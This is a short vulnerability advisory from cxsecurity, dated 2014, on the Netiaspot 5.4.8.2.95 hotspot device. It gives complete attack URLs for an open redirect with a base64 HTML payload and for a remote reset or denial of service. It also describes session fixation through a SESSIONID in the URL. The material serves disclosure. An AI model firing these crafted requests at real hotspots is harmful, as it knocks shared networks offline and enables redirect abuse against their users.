Netiaspot 5.4.8.2.95 Remote Denial Of Service

2014.01.21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

Netiaspot 5.4.8.2.95 Remote Denial Of Service http://cxsecurity.com/ Maksymilian Arciemowicz 1. Open Redirect http://netiaspot.home/index.cgi?intercept_id=300&troubleshoot_seq=0&org_url=data:text/html;base64,PEgxPkNYPElNRyBTUkM9Imh0dHA6Ly9jZXJ0LmN4Lz9ORVRJQSI+&no_dns=1&host_mac=22%3a13%3a11%3a12%3ac1%3a12&page=page_close_browser&req_mode=0&strip_page_top=0&strip_page_tabs=0&strip_page_logo=0&scroll_top=0&page_session_id=&button_value= 2. Session Fixation SESSIONID in URL. http://cert.cx/0x41424344/hijacking1.png http://cert.cx/0x41424344/hijacking2.png 3. Remote DoS Conntect to local unsecured network by wifi FON_NETIA_FREE_INTERNET‚ and ping netiaspot.home. Get IP and hit http://[IP]/index.cgi?intercept_id=60&troubleshoot_seq=0&org_url=http%3a%2f%2fcert%2ecx&host_mac=22%3a13%3a11%3a12%3ac1%3a12&page=page_ppp_no_server&req_mode=0&strip_page_top=0&strip_page_tabs=0&strip_page_logo=0&scroll_top=0&page_session_id=&button_value= http://cert.cx/0x41424344/remotereset.png

References:

http://cert.cx/0x41424344/hijacking1.png
http://cert.cx/0x41424344/hijacking2.png
http://cert.cx/0x41424344/remotereset.png
http://cert.cx/0x41424344/n33tia.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top